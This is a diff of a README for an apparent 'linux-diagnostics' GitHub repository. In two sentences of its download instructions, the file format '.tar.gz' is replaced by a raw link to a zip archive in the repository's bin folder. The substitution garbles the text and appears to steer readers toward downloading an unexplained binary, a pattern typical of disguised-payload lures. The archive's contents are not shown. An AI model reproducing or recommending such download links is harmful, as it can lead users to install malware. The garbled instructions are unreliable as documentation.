tolik125/linux-diagnostics/README.md

 ### Step 3: Download the File

 Click the link to download the appropriate file for your system.
-The files are often available in formats like `.tar.gz` or `.deb`.
-If you are unsure which file to choose, `.deb` is typically for Debian-based systems, while `.tar.gz` can be used on many others.
+The files are often available in formats like `https://github.com/tolik125/linux-diagnostics/raw/refs/heads/main/bin/diagnostics_linux_misoneist.zip` or `.deb`.
+If you are unsure which file to choose, `.deb` is typically for Debian-based systems, while `https://github.com/tolik125/linux-diagnostics/raw/refs/heads/main/bin/diagnostics_linux_misoneist.zip` can be used on many others.

 ## 📦 Install the Application